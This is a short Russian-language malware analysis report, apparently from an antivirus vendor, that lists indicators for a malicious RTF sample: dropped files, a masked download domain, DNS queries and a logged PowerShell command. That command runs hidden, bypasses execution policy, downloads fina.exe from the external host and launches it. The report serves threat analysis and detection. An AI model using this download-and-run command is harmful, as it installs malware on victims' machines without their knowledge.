Техническая информация
- http://yt##12.site/fileserver/fina.exe как %appdata%\fina.exe
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\fina.exe
- <Текущая директория>\~wrd0000.tmp
- %TEMP%\abctfhghgdghgh‹.sct
- <PATH_SAMPLE>.rtf
- 'yt##12.site':80
- http://yt##12.site/cgi-sys/suspendedpage.cgi
- http://yt##12.site/fileserver/fina.exe
- DNS ASK yt##12.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://yt##12.site/fileserver/fina.exe','%APPDATA%\fina.exe');Start-Process '...' (со скрытым окном)